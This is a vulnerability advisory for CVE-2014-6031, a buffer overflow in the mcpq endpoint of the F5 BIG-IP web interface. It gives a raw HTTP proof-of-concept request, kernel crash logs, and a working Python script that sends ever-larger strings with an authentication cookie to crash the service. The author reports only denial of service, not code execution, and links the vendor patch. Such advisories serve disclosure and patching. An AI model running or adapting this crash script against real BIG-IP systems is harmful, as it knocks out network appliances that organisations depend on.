F5 BigIP MCPQ vulnerability CVE-2014-6031

F5 BigIP MCPQ vulnerability CVE-2014-6031 - Authenticated

Vulnerable Systems:

Description:

An instance was discovered where the application code is vulnerable to a buffer overflow attack. 
Due to limited access not the system and selinux/ptrace protection in place there was not enough time to create a proper exploit for this issue.
It was possible to create Denial of Service condition, however, further exploitability was not analyzed.

POC:

This was achieved by gradually sending larger strings in the obj1 parameter field:

POST /mcpq/mcpq HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=F4272FF1E20F4CD2E8946D7CA0F28485; BIGIPAuthCookie=B9F3DDD8ED712164358FC4CF67C1A83F6E33F401; BIGIPAuthUsernameCookie=admin; F5_CURRENT_PARTITION=Common; f5_refreshpage="https%3A//192.168.235.216/tmui/Control/jspmap/tmui/system/user/list.jsp"; f5currenttab="main"; f5mainmenuopenlist=""; f5advanceddisplay=""; f5formpage="/tmui/system/user/list.jsp?&"
Connection: keep-alive
Referer: https://x.x.x.x/tmui/dashboard/MonitorDashboardModule.swf
Content-type: application/x-www-form-urlencoded
Content-Length: 365381

func=stat&obj1=aaaaaaa*x
On the target server the crash can be observed in the kernel logs:
mcpq[10187]: segfault at 56f19014 ip 0000000056cdb2c3 sp 00000000ff86be7c error 4 in libc-2.5.so[56c6b000+155000]
mcpq[10312]: segfault at 56f19014 ip 0000000056cdb2c3 sp 00000000ffe0f97c error 4 in libc-2.5.so[56c6b000+155000]
mcpq[10587]: segfault at 56f19014 ip 0000000056cdb2c3 sp 00000000ffe1073c error 4 in libc-2.5.so[56c6b000+155000]
mcpq[10594]: segfault at 56f19014 ip 0000000056cdb2c3 sp 00000000ffd1b84c error 4 in libc-2.5.so[56c6b000+155000]

Python POC

import httplib
import urllib
import urllib2

CRASH_TEMPLATE = """func=stat&obj1=%s"""
SERVER_ADDR = "127.0.0.1"
SERVER_PORT = 443

def GenCrash(userargs):
    body = CRASH_TEMPLATE%(userargs)
    blen = len(body)
    requestor = httplib.HTTPS(SERVER_ADDR, SERVER_PORT)
    #httplib.HTTPSConnection.debuglevel = 10
    requestor.putrequest("POST", "/mcpq/mcpq")
    requestor.putheader("Host", SERVER_ADDR)
    requestor.putheader("Content-Type", 'application/x-www-form-urlencoded')
    requestor.putheader("Cookie", "BIGIPAuthCookie=798FCD4F7E031F3E5ED83FA065862B4EB302F4B1")
    requestor.putheader("Content-Length", str(blen))
    requestor.endheaders()
    requestor.send(body)
    (status_code, message, reply_headers) = requestor.getreply()
    reply_body = requestor.getfile().read()
   
    print reply_body

def main():
  for i in range(0,500):
    GenCrash("A"*1024*int(i))

if __name__ == '__main__':
  main()

Impact:

It is possible to cause a Denial of Service condition.

Recommendation:

Please see F5’s advisory for patch details.
https://support.f5.com/kb/en-us/solutions/public/16000/100/sol16196.html

© 2015 coma. All rights reserved.
Disclaimer: There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk.
In no event shall the author be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.